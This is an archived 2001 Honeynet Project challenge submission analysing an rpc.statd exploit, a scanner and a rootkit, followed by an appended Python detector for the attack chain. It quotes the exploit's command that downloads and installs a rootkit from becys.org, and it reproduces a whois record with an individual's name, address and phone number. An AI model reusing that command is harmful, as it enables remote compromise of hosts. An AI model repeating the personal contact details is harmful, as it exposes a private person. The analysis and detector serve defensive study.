From brenda@itsx.com Fri Mar 23 10:13:51 2001
Date: Mon, 19 Mar 2001 12:23:42 +0100
From: brenda
To: project@honeynet.org
Subject: Scan of the Month March 2001

Hello,

My try to answer this month's (March 2001) challenge.

1. The blackhat gets a rootkit (with lynx), installs it (in /usr/sbin/.mail) and runs a scanner against a large number of networks, e.g. he/she scans the 216.210.0.0/16 network with "./luckgo 216 210".

2. The tool "connects" to port 111 and asks where/if the rpc.statd is running. Then it will exploit the vulnerable rpc.statd, get root, and install the rootkit. Or as the blackhats say, from the luckroot.tar luckgo file, "Program launched in background,it will SCAN,GET ROOT and INSTALL a rOOtKiT for U."

3. From the luckstatdx.c code it works against

   "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600, 9},
   {1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
   {2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9}

   It exploits the rpc.statd service which is installed by default on Redhat 6.2, 6.1, 6.0. According to Cert http://www.cert.org/advisories/CA-2000-17.html this is an input validation problem.

   What ./luckgo does is scan the hosts (1 by 1), from the given network, to see if they have this rpc.statd service running. It asks on which port because this may vary. It exploits them, with the remote root exploit, then it installs the rootkit. Here it installs the rootkit, from luckstatdx.c:

   // Becys was modify herre some cmd.
   fmax = max(fileno(stdin), sockd) + 1;
   send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);

4. Is it a worm or something else? There is some discussion possible about if it is a worm or not. So first you have to define what a worm is. In my opinion a worm is something that spreads without the active interaction of a human (similar to the Morris worm). Since the blackhat does the scanning of the networks by hand I would say it is not a worm. But if you would add the automated scanning capability to the rootkit it would classify as a worm. Since I did not classify it as a worm I would say it is a "highly" automated rootkit but with a similar security impact as a worm.

5. This tool is not original. The exploit differs only in the next lines from the original http://www.securityfocus.com/data/vulnerabilities/exploits/statdx.c/

   difference:

   // Becys was modify herre some cmd.
   fmax = max(fileno(stdin), sockd) + 1;
   send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);
   // Aici cred ca trebuie un exit.
   for(;;) {

   I found it hard to tell if the rootkit, xzibit.tar.gz, is different from other linux rootkits. I tried to compare the "rootkit" binaries (e.g. ps, netstat, ifconfig) but found differences between previously released rootkits and the xzibit tarball. But if you read Cert http://www.cert.org/incident_notes/IN-2000-10.html I would say that this rootkit is a modified version of the "'t0rnkit' rootkit". Cert states "Since May of 2000, we have observed more than six different versions of a rootkit being called 't0rnkit', or 'tornkit'."

6. The website mentioned in the exploit was "disabled" during this challenge. But from the whois database I got:

   whois -h whois.bulkregister.com becys.org
   ...
   bSoft
   1 Hensel Dr. Apt.#Z1F
   College Station, Texas 77840
   US

   Domain Name: BECYS.ORG

   Administrative Contact:
   Qian Wang becys@yahoo.com
   bSoft
   1 Hensel Dr. Apt.#Z1F
   College Station, Texas 77840
   US
   Phone- (979)862-9233
   Fax-

   Technical Contact:
   Web Site Source, In info@websitesource.com
   Web Site Source, Inc.
   2476 Bolsover, Suite 484
   Houston, TX 77005-2518
   US
   Phone- 713-667-2520
   Fax- 800-863-6499

   Record updated on 2000-09-11 00:00:00.
   Record created on 2000-09-11.
   Record expires on 2002-09-11.
   Database last updated on 2001-03-11 23:45:47 EST.

   Domain servers in listed order:
   NS.WEBSITESOURCE.COM 216.147.43.135
   NS2.WEBSITESOURCE.COM 216.147.1.116

   It seems like a rootkit from Texas and not from Eastern Europe.
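The scan -> exploit -> rootkit-fetch chain described in this submission can be spotted on the defender's side by correlating flow records. The following detector is an added example, not code from the submission or from the Honeynet Project; it assumes a hypothetical flow-record format (ts, src, dst, dport, payload_snippet) and uses constructed sample records.

```python
"""Detect the luckgo scan -> rpc.statd exploit -> rootkit fetch chain in flow records.

Assumed (hypothetical) record format: (ts, src, dst, dport, payload_snippet).
Real sensors differ; only the two detection functions matter.
"""
from collections import defaultdict

SUNRPC_PORT = 111  # portmapper, queried by luckgo to locate rpc.statd
# Rootkit URL and shell command fragments taken from the modified luckstatdx.c quoted above
ROOTKIT_URL = "http://www.becys.org/xzibit.tar.gz"
SHELL_MARKERS = ("uname -a; id; wget -nd " + ROOTKIT_URL, "cd lamerk; ./install")

# Constructed sample: 10.0.0.5 sweeps part of 216.210.0.0/16 on port 111, exploits
# 216.210.3.7, pushes the command string to the bound shell, and the victim then fetches
# the rootkit from a constructed web-server address (198.51.100.10).
SAMPLE_FLOWS = [
    (100, "10.0.0.5", "216.210.1.%d" % i, 111, "") for i in range(1, 26)
] + [
    (200, "10.0.0.5", "216.210.3.7", 111, ""),
    (201, "10.0.0.5", "216.210.3.7", 32768,
     "cd /; uname -a; id; wget -nd " + ROOTKIT_URL + "; tar -zxvf xzibit.tar.gz; "
     "cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n"),
    (202, "216.210.3.7", "198.51.100.10", 80, "GET /xzibit.tar.gz HTTP/1.0"),
    (300, "192.168.1.9", "216.210.5.5", 80, "GET / HTTP/1.0"),  # benign noise
]


def portmap_sweepers(flows, min_targets=20):
    """Sources that probed port 111 on at least min_targets distinct hosts (luckgo sweep)."""
    seen = defaultdict(set)
    for _, src, dst, dport, _ in flows:
        if dport == SUNRPC_PORT:
            seen[src].add(dst)
    return {src for src, dsts in seen.items() if len(dsts) >= min_targets}


def exploit_chain(flows):
    """Victims that received the post-exploit command string and then fetched the rootkit.

    Returns a list of (victim, attacker) pairs.
    """
    commanded = {}  # victim -> source that sent the shell command string
    for _, src, dst, _, payload in flows:
        if all(m in payload for m in SHELL_MARKERS):
            commanded[dst] = src
    hits = []
    for _, src, _, dport, payload in flows:
        if src in commanded and dport == 80 and "xzibit.tar.gz" in payload:
            hits.append((src, commanded[src]))
    return hits
```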